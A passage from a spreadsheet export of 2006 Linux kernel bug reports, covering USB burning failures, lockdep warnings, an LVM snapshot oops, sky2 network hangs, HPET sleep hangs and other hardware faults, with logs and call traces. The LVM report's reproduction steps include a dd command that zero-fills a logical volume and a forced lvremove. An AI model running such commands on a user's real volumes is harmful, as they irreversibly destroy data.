controller: Creative Labs SB Live! EMU10k1 (rev 0a) 02:03.1 Input device controller: Creative Labs SB Live! Game Port (rev 0a) 02:04.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/ 8139C+ (rev 10) 02:07.0 Multimedia audio controller: C-Media Electronics Inc CM8738 (rev 10)</t>
  </si>
  <si>
    <t>CD/DVD burning with USB writer doesn't work</t>
  </si>
  <si>
    <t>2006-08-18 18:06 UTC</t>
  </si>
  <si>
    <t>Marc Langer</t>
  </si>
  <si>
    <t>2007-06-04 13:48 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13.2, perhaps 2.6.14/ 2.6.15 (I found it broken since 2.6.16) Distribution: Debian Unstable Hardware Environment: i686, USB Mass Storage Device Genesyslogic 001600016303 Software Environment: cdrecord (newest released version), Nero Linux Problem Description: cdrecord cannot burn, error message: Cannot allocate memory. write_g1: scsi sendcmd: no error CDB: 2A 00 00 00 00 00 00 00 1B 00 status: 0x0 (GOOD STATUS) cmd finished after 0.000s timeout 200s cdrecord: A write error occured. Nero simply complains about an unknown burn error without details. # lsusb Bus 005 Device 001: ID 0000:0000 Bus 004 Device 001: ID 0000:0000 Bus 003 Device 001: ID 0000:0000 Bus 002 Device 001: ID 0000:0000 Bus 001 Device 006: ID 05e3:0701 Genesys Logic, Inc. USB 2.0 IDE Adapter Bus 001 Device 001: ID 0000:0000 # dmesg | grep usb usb usb1: Product: EHCI Host Controller usb usb1: Manufacturer: Linux 2.6.17.8 ehci_hcd usb usb1: SerialNumber: 0000:00:10.4 usb usb1: uevent usb usb1: configuration #1 chosen from 1 choice usb usb1: adding 1-0:1.0 (config #1, interface 0) usb 1-0:1.0: uevent hub 1-0:1.0: usb_probe_interface hub 1-0:1.0: usb_probe_interface - got id hub 1-0:1.0: no power switching (usb 1.0) drivers/usb/core/inode.c: creating file '001' drivers/usb/core/inode.c: creating file '002' usb usb2: default language 0x0409 usb usb2: new device strings: Mfr=3, Product=2, SerialNumber=1 usb usb2: Product: UHCI Host Controller usb usb2: Manufacturer: Linux 2.6.17.8 uhci_hcd usb usb2: SerialNumber: 0000:00:10.0 usb usb2: uevent usb usb2: configuration #1 chosen from 1 choice usb usb2: adding 2-0:1.0 (config #1, interface 0) usb 2-0:1.0: uevent hub 2-0:1.0: usb_probe_interface hub 2-0:1.0: usb_probe_interface - got id hub 2-0:1.0: no power switching (usb 1.0) drivers/usb/core/inode.c: creating file '001' drivers/usb/core/inode.c: creating file '003' usb usb3: default language 0x0409 usb usb3: new device strings: Mfr=3, Product=2, SerialNumber=1 usb usb3: Product: UHCI Host Controller usb usb3: Manufacturer: Linux 2.6.17.8 uhci_hcd usb usb3: SerialNumber: 0000:00:10.1 usb usb3: uevent usb usb3: configuration #1 chosen from 1 choice usb usb3: adding 3-0:1.0 (config #1, interface 0) usb 3-0:1.0: uevent hub 3-0:1.0: usb_probe_interface hub 3-0:1.0: usb_probe_interface - got id hub 3-0:1.0: no power switching (usb 1.0) drivers/usb/core/inode.c: creating file '001' drivers/usb/core/inode.c: creating file '004' usb usb4: default language 0x0409 usb usb4: new device strings: Mfr=3, Product=2, SerialNumber=1 usb usb4: Product: UHCI Host Controller usb usb4: Manufacturer: Linux 2.6.17.8 uhci_hcd usb usb4: SerialNumber: 0000:00:10.2 usb usb4: uevent usb usb4: configuration #1 chosen from 1 choice usb usb4: adding 4-0:1.0 (config #1, interface 0) usb 4-0:1.0: uevent hub 4-0:1.0: usb_probe_interface hub 4-0:1.0: usb_probe_interface - got id hub 4-0:1.0: no power switching (usb 1.0) usb 1-5: new high speed USB device using ehci_hcd and address 2 drivers/usb/core/inode.c: creating file '001' drivers/usb/core/inode.c: creating file '005' usb usb5: default language 0x0409 usb usb5: new device strings: Mfr=3, Product=2, SerialNumber=1 usb usb5: Product: UHCI Host Controller usb usb5: Manufacturer: Linux 2.6.17.8 uhci_hcd usb usb5: SerialNumber: 0000:00:10.3 usb usb5: uevent usb usb5: configuration #1 chosen from 1 choice usb usb5: adding 5-0:1.0 (config #1, interface 0) usb 5-0:1.0: uevent hub 5-0:1.0: usb_probe_interface hub 5-0:1.0: usb_probe_interface - got id hub 5-0:1.0: no power switching (usb 1.0) usb 1-5: device descriptor read/64, error -32 drivers/usb/core/inode.c: creating file '001' usb 1-5: device descriptor read/64, error -32 usb 1-5: new high speed USB device using ehci_hcd and address 3 usb 1-5: device descriptor read/64, error -32 usb 1-5: device descriptor read/64, error -32 usb 1-5: new high speed USB device using ehci_hcd and address 4 usb 1-5: device not accepting address 4, error -32 usb 1-5: new high speed USB device using ehci_hcd and address 5 usb 1-5: device not accepting address 5, error -32 usb 1-8: new high speed USB device using ehci_hcd and address 6 usb 1-8: default language 0x0409 usb 1-8: new device strings: Mfr=2, Product=3, SerialNumber=4 usb 1-8: Product: USB Mass Storage Device usb 1-8: Manufacturer: Genesyslogic usb 1-8: SerialNumber: 001600016303 usb 1-8: uevent usb 1-8: configuration #1 chosen from 1 choice usb 1-8: adding 1-8:1.0 (config #1, interface 0) usb 1-8:1.0: uevent usb-storage 1-8:1.0: usb_probe_interface usb-storage 1-8:1.0: usb_probe_interface - got id usb-storage: device found at 6 usb-storage: waiting for device to settle before scanning usbcore: registered new driver usb-storage usb-storage: device scan complete</t>
  </si>
  <si>
    <t>scsi error handling needs lockdep annotation</t>
  </si>
  <si>
    <t>2006-08-20 13:49 UTC</t>
  </si>
  <si>
    <t>Booting and 2.6.18rc4 kernel with a USB memory stick plugged in gets me this interesting dump from the lockdep validator, which seems to point to a missing annotation in scsi error handling. PM: Adding info for No Bus:usbdev5.6_ep82 PM: Adding info for No Bus:usbdev5.6_ep01 PM: Adding info for No Bus:usbdev5.6_ep83 INFO: trying to register non-static key. the code is fine but needs lockdep annotation. turning off the locking correctness validator. Call Trace: [&lt;ffffffff8026e8fd&gt;] show_trace+0xae/0x319 [&lt;ffffffff8026eb7d&gt;] dump_stack+0x15/0x17 [&lt;ffffffff802a826a&gt;] __lock_acquire+0x135/0xa64 [&lt;ffffffff802a913c&gt;] lock_acquire+0x4b/0x69 [&lt;ffffffff80267b3f&gt;] _spin_lock_irq+0x2b/0x38 [&lt;ffffffff802655b3&gt;] wait_for_completion_timeout+0x35/0xd7 [&lt;ffffffff8803654c&gt;] :scsi_mod:scsi_send_eh_cmnd+0x238/0x3d3 [&lt;ffffffff88036767&gt;] :scsi_mod:scsi_eh_tur+0x3d/0x91 [&lt;ffffffff88037009&gt;] :scsi_mod:scsi_error_handler+0x400/0xa8c [&lt;ffffffff802352ea&gt;] kthread+0x100/0x136 [&lt;ffffffff802614de&gt;] child_rip+0x8/0x12 DWARF2 unwinder stuck at child_rip+0x8/0x12 Leftover inexact backtrace: [&lt;ffffffff80267bb2&gt;] _spin_unlock_irq+0x2b/0x31 [&lt;ffffffff80260b1c&gt;] restore_args+0x0/0x30 [&lt;ffffffff8024fa61&gt;] run_workqueue+0x19/0xfa [&lt;ffffffff802351ea&gt;] kthread+0x0/0x136 [&lt;ffffffff802614d6&gt;] child_rip+0x0/0x12</t>
  </si>
  <si>
    <t>Wont link, undefined reference to `X86_FEATURE_UP'</t>
  </si>
  <si>
    <t>2.6.18-rc4-mm2</t>
  </si>
  <si>
    <t>2006-08-21 22:33 UTC</t>
  </si>
  <si>
    <t>Sophia Herzog</t>
  </si>
  <si>
    <t>2006-10-22 06:46 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Gentoo Hardware Environment: EM64T, E6600 (Conroe) on P965 chipset Software Environment: gentoo-amd64 Problem Description: Kernel wont link, error msg is: CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 kernel/built-in.o:(.smp_altinstructions+0x10): undefined reference to `X86_FEATURE_UP' kernel/built-in.o:(.smp_altinstructions+0x28): undefined reference to `X86_FEATURE_UP' kernel/built-in.o:(.smp_altinstructions+0x40): undefined reference to `X86_FEATURE_UP' kernel/built-in.o:(.smp_altinstructions+0x58): undefined reference to `X86_FEATURE_UP' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: Use the .config i made for my system and make clean &amp;&amp; make bzImage</t>
  </si>
  <si>
    <t>Oops when removing full snapshot</t>
  </si>
  <si>
    <t>2006-08-22 04:24 UTC</t>
  </si>
  <si>
    <t>Damian Pietras</t>
  </si>
  <si>
    <t>2006-12-05 08:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.27 (only stable tested) Distribution: custom/Debian Hardware Environment: P IV, 3ware SATA controller, 1GB RAM Software Environment: LVM Problem Description: Invoking lvremove /dev/vg/snapshot when snapshot is full (100% displayed by lvs in Snap% column) causes Oops in most cases. THe snapshot can be removed after reboot. Steps to reproduce: 1. Create a volume and a snapshot: lvcreate -n lv -L 2G vg lvcreate -s -n snap -L 128M vg 2. Write to the volume more than the snapshot size: dd if=/dev/zero of=/dev/vg/lv bs=1M count=256 3. Try to remove the snapshot: lvremove -f /dev/vg/snap Now you should see segmentation fault and an Oops. The snapshot still exists.</t>
  </si>
  <si>
    <t>configuration program assumes argv[1] exists</t>
  </si>
  <si>
    <t>2006-08-23 05:25 UTC</t>
  </si>
  <si>
    <t>Brant Langer Gurganus</t>
  </si>
  <si>
    <t>2006-08-23 08:29 UTC</t>
  </si>
  <si>
    <t>Problem Description: The configuration program that is build with "make menuconfig" currently expects an argument telling the configuration options for the architecture, but it uses that argument without checking argc if it exists. Steps to reproduce: Run the kernel configuration program with no arguments. It will segmentation fault.</t>
  </si>
  <si>
    <t>2.6.18-rc4-git1</t>
  </si>
  <si>
    <t>Panasonic CF-18 Touchpad Being Detected as Touchscreen</t>
  </si>
  <si>
    <t>2006-08-23 19:07 UTC</t>
  </si>
  <si>
    <t>john</t>
  </si>
  <si>
    <t>2007-05-10 10:23 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16.16 (there may be a more recent one) Distribution: Stock kernel on Gentoo Hardware Environment: Panasonic CF-18 Software Environment: Problem Description: On bootup, the touchpad is seen as a touchscreen. drivers/input/mouse/lifebook.c had the following added: { .ident = "CF-18", .matches = { DMI_MATCH(DMI_PRODUCT_NAME, "CF-18"), }, }, It looks like since that since both the touchscreen and touchpad go through this logic, the condition is hit for each. This makes the touchpad be seen as an absoloute device and generally be wonky. Steps to reproduce: Compile kernel with mouse support and boot on a CF-18.</t>
  </si>
  <si>
    <t>sky2 hangs on my mac mini as soon as I ssh in via IPv6 and edit /etc/passwd using vim (reproducable)</t>
  </si>
  <si>
    <t>Linux mini 2.6.18-rc3 #37 SMP PREEMPT Tue Aug 22 00:20:48 CEST 2</t>
  </si>
  <si>
    <t>2006-08-24 01:26 UTC</t>
  </si>
  <si>
    <t>2006-08-25 15:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Linus Head + sky2 fix from Stephen Distribution: Debian Testing Hardware Environment: Intel Mac Mini x86 core duo Software Environment: 32 bit libc6 2.3.6 Problem Description: Sky2 Network Driver in my machine starts to hang as soon as I ssh in via IPv6 and start editing /etc/passwd. This is reproducable Aug 20 20:52:10 mini kernel: sky2 v1.5 addr 0x90200000 irq 17 Yukon-EC (0xb6) rev 2 Aug 20 20:52:10 mini kernel: sky2 eth0: addr 00:16:cb:a3:91:3c Aug 20 20:52:12 mini kernel: sky2 eth0: enabling interface Aug 20 20:52:12 mini kernel: sky2 eth0: Link is up at 100 Mbps, full duplex, flow control both Aug 20 21:01:34 mini kernel: sky2 eth0: hw error interrupt status 0x30 Aug 20 21:01:34 mini kernel: sky2 eth0: ram data read parity error Aug 20 21:01:34 mini kernel: sky2 eth0: ram data write parity error Aug 20 21:01:34 mini kernel: sky2 eth0: hw error interrupt status 0x8 Aug 20 21:01:34 mini kernel: sky2 eth0: MAC parity error Aug 20 21:01:34 mini kernel: sky2 eth0: hw error interrupt status 0x20 Aug 20 21:01:34 mini kernel: sky2 eth0: ram data read parity error Aug 20 21:01:34 mini kernel: sky2 eth0: hw error interrupt status 0x8 Aug 20 21:01:34 mini kernel: sky2 eth0: MAC parity error Aug 21 11:23:49 mini kernel: sky2 v1.5 addr 0x90200000 irq 17 Yukon-EC (0xb6) rev 2 Aug 21 11:23:49 mini kernel: sky2 eth0: addr 00:16:cb:a3:91:3c Aug 21 11:23:50 mini kernel: sky2 eth0: enabling interface Aug 21 11:23:50 mini kernel: sky2 eth0: Link is up at 100 Mbps, full duplex, flow control both Aug 21 18:38:44 mini kernel: sky2 eth0: hw error interrupt status 0x30 Aug 21 18:38:44 mini kernel: sky2 eth0: ram data read parity error Aug 21 18:38:44 mini kernel: sky2 eth0: ram data write parity error Aug 21 18:38:44 mini kernel: sky2 eth0: hw error interrupt status 0x8 Aug 21 18:38:44 mini kernel: sky2 eth0: MAC parity error Aug 21 18:38:44 mini kernel: sky2 eth0: hw error interrupt status 0x20 Aug 21 18:38:44 mini kernel: sky2 eth0: ram data read parity error Aug 21 18:38:44 mini kernel: sky2 eth0: hw error interrupt status 0x8 Aug 21 18:38:44 mini kernel: sky2 eth0: MAC parity error Aug 21 18:48:31 mini kernel: sky2 v1.5 addr 0x90200000 irq 17 Yukon-EC (0xb6) rev 2 Aug 21 18:48:31 mini kernel: sky2 eth0: addr 00:16:cb:a3:91:3c Aug 21 18:48:32 mini kernel: sky2 eth0: enabling interface Aug 21 18:48:32 mini kernel: sky2 eth0: Link is up at 100 Mbps, full duplex, flow control both Aug 21 20:53:56 mini kernel: sky2 eth0: tx timeout Aug 21 20:53:56 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:53:56 mini kernel: sky2 status report lost? Aug 21 20:54:01 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:01 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:01 mini kernel: sky2 status report lost? Aug 21 20:54:06 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:06 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:06 mini kernel: sky2 status report lost? Aug 21 20:54:11 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:11 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:11 mini kernel: sky2 status report lost? Aug 21 20:54:16 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:16 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:16 mini kernel: sky2 status report lost? Aug 21 20:54:21 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:21 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:21 mini kernel: sky2 status report lost? Aug 21 20:54:26 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:26 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:26 mini kernel: sky2 status report lost? Aug 21 20:54:31 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:31 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:31 mini kernel: sky2 status report lost? Aug 21 20:54:36 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:36 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:36 mini kernel: sky2 status report lost? Aug 21 20:54:41 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:41 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:41 mini kernel: sky2 status report lost? Aug 21 20:54:46 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:46 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:46 mini kernel: sky2 status report lost? Aug 21 20:54:51 mini kernel: sky2 eth0: tx timeout Aug 21 20:54:51 mini kernel: sky2 eth0: transmit ring 53 .. 30 report=54 done=54 Aug 21 20:54:51 mini kernel: sky2 status report lost? Aug 21 20:56:17 mini kernel: sky2 v1.5 addr 0x90200000 irq 17 Yukon-EC (0xb6) rev 2 Aug 21 20:56:17 mini kernel: sky2 eth0: addr 00:16:cb:a3:91:3c Aug 21 20:56:18 mini kernel: sky2 eth0: enabling interface Aug 21 20:56:18 mini kernel: sky2 eth0: Link is up at 100 Mbps, full duplex, flow control both Steps to reproduce: See problem description</t>
  </si>
  <si>
    <t>prism54 does not respect carrier</t>
  </si>
  <si>
    <t>2006-08-24 02:49 UTC</t>
  </si>
  <si>
    <t>2008-07-02 06:49 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: probably none Distribution: Gentoo Hardware Environment: ibm thinkpad z60m Software Environment: Problem Description: prism54 does not respect the carrier flag - it is always 1 in /sys/class/net/eth0/carrier Steps to reproduce: bring up the interface assign a blindly wrong AP or encryption key watch it set carrier to 1 even when not associated</t>
  </si>
  <si>
    <t>Thinkpad X60 stuck at low speed without battery</t>
  </si>
  <si>
    <t>2006-08-26 16:49 UTC</t>
  </si>
  <si>
    <t>Zoltan Hidvegi</t>
  </si>
  <si>
    <t>2008-10-19 22:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian unstable Hardware Environment: Thinkpad X60 Core Duo 1.83GHz Software Environment: speedstep-centrino Problem Description: CPU speed cannot be increased when the battery is not present. Steps to reproduce: Using ondemand governor, frequency scaling works as expected when the battery is in the system, both with A/C plugged in or unplugged. When the bettery is removed, if the CPU is busy, it keeps running at 1.83GHz, /sys/devices/system/cpu/cpu[01]/cpufreq/scaling_max_freq shows 1833000. When the busy job quits, the CPU drops back to 1GHz and /sys/devices/system/cpu/cpu[01]/cpufreq/scaling_max_freq also changes to 1000000 and can no longer be increased. After reinserting the battery, /sys/devices/system/cpu/cpu[01]/cpufreq/scaling_max_freq accepts larger frequencies again. When using the performance governor, the speed drops immediately uppon removing the battery. Thinkpad has the latest (1.06) BIOS. This happens even is the battery ACPI module is not loaded.</t>
  </si>
  <si>
    <t>nanosleep blocks indefinitely when CONFIG_HPET_TIMER is enabled</t>
  </si>
  <si>
    <t>2006-08-27 06:08 UTC</t>
  </si>
  <si>
    <t>Michael Olbrich</t>
  </si>
  <si>
    <t>2006-09-06 16:45 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.3 I did not test 2.6.17.11 yet but I'm pretty sure the bug was introduced in 2.6.18-rc1 Distribution: Debian unstable Hardware Environment: Thinkpad Z61m It has a Pentium M CoreDuo. /proc/cpuinfo says: Genuine Intel(R) CPU T2500 @ 2.00GHz Problem Description: When CONFIG_HPET_TIMER is enabled any call to nanosleep blocks indefinitely. For me that's in a initramfs during udevsettle. Alt+PrintScreen+T says something about nanosleep. replaceing udevsettle with "busybox sleep 1" blocks as well with similar results for Alt+PrintScreen+T. The waiting process can be killed with Alt+PrintScreen+I and the boot process continues until the next nanosleep. When CONFIG_HPET_TIMER is disabled the problem does not occur. I have tested 2.6.18-rc1 - 2.6.18-rc4 and several 2.6.18-rc?-mm? kernels. The problem occurs for all of them. I assume the bug was intoduced with the big i386 timer related patches. "indefinitely" is of course a guess. I did however wait for serveral minutes for a "busybox sleep 1" to complete.</t>
  </si>
  <si>
    <t>ieee1394 doesn't work after resume</t>
  </si>
  <si>
    <t>2.6.17.11</t>
  </si>
  <si>
    <t>2006-08-29 10:20 UTC</t>
  </si>
  <si>
    <t>Ritesh Raj Sarraf</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Debian testing/unstable Hardware Environment: Intel Pentium M 1.5 Ghz RAM: 768MB Software Environment: Debian testing/unstable Vanilla Kernel 2.6.17.11 + Software Suspend 2 Problem Description: On resume from a hibernated state, ieee1394 networking doesn't work. The ifconfig out shows everything correct but you cannot ping to any host on that network. Reloading the modules also doesn't help. Steps to reproduce: 1) Install linux with Software Suspend 2 2) Hibernate. 3) On resume, the ieee1394 network doesn't work. Here are the logs: While doing a ping, the kernel logged the following messages. ohci1394: fw-host0: Error in reception of SelfID packets [0x00030014/0x000932d1] (count: 0) ohci1394: fw-host0: Error in reception of SelfID packets [0x00040014/0x000932d1] (count: 1) ohci1394: fw-host0: Error in reception of SelfID packets [0x00050014/0x000932d1] (count: 2) ohci1394: fw-host0: Error in reception of SelfID packets [0x00060014/0x000932d1] (count: 3) ohci1394: fw-host0: Error in reception of SelfID packets [0x00070014/0x000932d1] (count: 4) ohci1394: fw-host0: Error in reception of SelfID packets [0x00080014/0x000932d1] (count: 5) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x000a0014/0x000932d1] (count: 0) ohci1394: fw-host0: Error in reception of SelfID packets [0x000b0014/0x000932d1] (count: 1) ohci1394: fw-host0: Error in reception of SelfID packets [0x000c0014/0x000932d1] (count: 2) ohci1394: fw-host0: Error in reception of SelfID packets [0x000d0014/0x000932d1] (count: 3) ohci1394: fw-host0: Error in reception of SelfID packets [0x000e0014/0x000932d1] (count: 4) ohci1394: fw-host0: Error in reception of SelfID packets [0x000f0014/0x000932d1] (count: 5) ohci1394: fw-host0: Error in reception of SelfID packets [0x00100014/0x000932d1] (count: 6) ohci1394: fw-host0: Error in reception of SelfID packets [0x00110014/0x000932d1] (count: 7) ohci1394: fw-host0: Error in reception of SelfID packets [0x00120014/0x000932d1] (count: 8) ohci1394: fw-host0: Error in reception of SelfID packets [0x00130014/0x000932d1] (count: 9) ohci1394: fw-host0: Error in reception of SelfID packets [0x00140014/0x000932d1] (count: 10) ohci1394: fw-host0: Error in reception of SelfID packets [0x00150014/0x000932d1] (count: 11) ohci1394: fw-host0: Error in reception of SelfID packets [0x00160014/0x000932d1] (count: 12) ohci1394: fw-host0: Error in reception of SelfID packets [0x00170014/0x000932d1] (count: 13) ohci1394: fw-host0: Error in reception of SelfID packets [0x00180014/0x000932d1] (count: 14) ohci1394: fw-host0: Error in reception of SelfID packets [0x00190014/0x000932d1] (count: 15) ohci1394: fw-host0: Error in reception of SelfID packets [0x001a0014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x001b0014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x001c0014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x001d0014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x001e0014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ieee1394: Stopping reset loop for IRM sanity During reload, following messages were observed. ohci1394: fw-host0: Error in reception of SelfID packets [0x001f0014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x00200014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x00210014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x00220014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x00230014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ohci1394: fw-host0: Error in reception of SelfID packets [0x00240014/0x000932d1] (count: 16) ohci1394: fw-host0: Too many errors on SelfID error reception, giving up! ieee1394: impossible ack_complete from node 65535 (tcode 4) ieee1394: Current remote IRM is not 1394a-2000 compliant, resetting... ieee1394: Stopping reset loop for IRM sanity ieee1394: Node removed: ID:BUS[0-00:1023] GUID[00c09f00001f8a88] ieee1394: Node removed: ID:BUS[0-00:1023] GUID[354fc0002226c838] ieee1394: Unknown parameter `sbp2' ieee1394: Initialized config rom entry `ip1394' ACPI: PCI Interrupt 0000:02:07.0[A] -&gt; Link [LNKF] -&gt; GSI 11 (level, low) -&gt; IRQ 11 ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[11] MMIO=[e0205000-e02057ff] Max Packet=[2048] IR/IT contexts=[4/8] ieee1394: Host added: ID:BUS[0-00:1023] GUID[00c09f00001f8a88] ieee1394: Node added: ID:BUS[0-01:1023] GUID[354fc0002226c838] eth1394: eth2: IEEE-1394 IPv4 over 1394 Ethernet (fw-host0) ieee1394: sbp2: Driver forced to serialize I/O (serialize_io=1) ieee1394: sbp2: Try serialize_io=0 for better performance</t>
  </si>
  <si>
    <t>piix search sata-devices, they not exist</t>
  </si>
  <si>
    <t>2.6.18-rc5</t>
  </si>
  <si>
    <t>2006-08-29 12:01 UTC</t>
  </si>
  <si>
    <t>Torsten Wohlfarth</t>
  </si>
  <si>
    <t>2007-01-15 07:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.11 Distribution: Debian SID Hardware Environment: 0:1f.1 IDE interface: Intel Corporation 82801EB/ER (ICH5/ICH5R) IDE Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801EB (ICH5) SATA Controller (rev 02) Software Environment: Problem Description: # Aug 29 19:09:30 Dell-Home kernel: scsi1 : ata_piix # Aug 29 19:09:30 Dell-Home kernel: ata2: port is slow to respond, please be patient # Aug 29 19:09:30 Dell-Home kernel: ata2: port failed to respond (30 secs) # Aug 29 19:09:30 Dell-Home kernel: ata2: SRST failed (status 0xFF) # Aug 29 19:09:30 Dell-Home kernel: ata2: SRST failed (err_mask=0x100) # Aug 29 19:09:30 Dell-Home kernel: ata2: softreset failed, retrying in 5 secs # Aug 29 19:09:30 Dell-Home kernel: ata2: SRST failed (status 0xFF) # Aug 29 19:09:30 Dell-Home kernel: ata2: SRST failed (err_mask=0x100) # Aug 29 19:09:30 Dell-Home kernel: ata2: softreset failed, retrying in 5 secs # Aug 29 19:09:30 Dell-Home kernel: ata2: SRST failed (status 0xFF) # Aug 29 19:09:30 Dell-Home kernel: ata2: SRST failed (err_mask=0x100) # Aug 29 19:09:30 Dell-Home kernel: ata2: reset failed, giving up Steps to reproduce: every reboot</t>
  </si>
  <si>
    <t>shien</t>
  </si>
  <si>
    <t>__wake_up_common  Kernel Panic on kernel 2.6.16.1</t>
  </si>
  <si>
    <t>2006-08-29 19:55 UTC</t>
  </si>
  <si>
    <t>2007-11-29 08:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: P4 3.4G 1G mem Software Environment: 2.6.16.1 Problem Description: Aug 26 19:25:01 (none) kernel: Unable to handle kernel NULL pointer dereference at virtual address 0000003e Aug 26 19:25:01 (none) kernel: printing eip: Aug 26 19:25:01 (none) kernel: c0117285 Aug 26 19:25:01 (none) kernel: *pde = 00000000 Aug 26 19:25:01 (none) kernel: Oops: 0000 [#1] Aug 26 19:25:01 (none) kernel: SMP Aug 26 19:25:01 (none) kernel: Modules linked in: Aug 26 19:25:01 (none) kernel: CPU: 0 Aug 26 19:25:01 (none) kernel: EIP: 0060:[&lt;c0117285&gt;] Not tainted VLI Aug 26 19:25:01 (none) kernel: EFLAGS: 00010086 (2.6.16.1 #1) Aug 26 19:25:01 (none) kernel: EIP is at __wake_up_common+0x15/0x80 Aug 26 19:25:01 (none) kernel: eax: e5780288 ebx: e5780280 ecx: dffef500 edx: 0000003e Aug 26 19:25:01 (none) kernel: esi: e5780284 edi: 00000001 ebp: c1959ef8 esp: c1959ed8 Aug 26 19:25:01 (none) kernel: ds: 007b es: 007b ss: 0068 Aug 26 19:25:01 (none) kernel: Process khelper (pid: 8, threadinfo=c1958000 task=dffef540) Aug 26 19:25:01 (none) kernel: Stack: &lt;0&gt;c1959f20 e5780284 0000007b 0000007b ffffff0e e5780280 e5780284 00000282 Aug 26 19:25:01 (none) kernel: c1959f20 c0117445 e5780284 00000003 00000001 00000000 00000000 e577be40 Aug 26 19:25:01 (none) kernel: e577be44 de242300 e577be70 c012dcb9 e577be70 00000000 80efca00 de242320 Aug 26 19:25:01 (none) kernel: Call Trace: Aug 26 19:25:01 (none) kernel: [&lt;c0117445&gt;] complete+0x45/0x60 Aug 26 19:25:01 (none) kernel: [&lt;c012dcb9&gt;] run_workqueue+0x79/0xf0 Aug 26 19:25:01 (none) kernel: [&lt;c012d930&gt;] __call_usermodehelper+0x0/0x70 Aug 26 19:25:01 (none) kernel: [&lt;c012de88&gt;] worker_thread+0x158/0x180 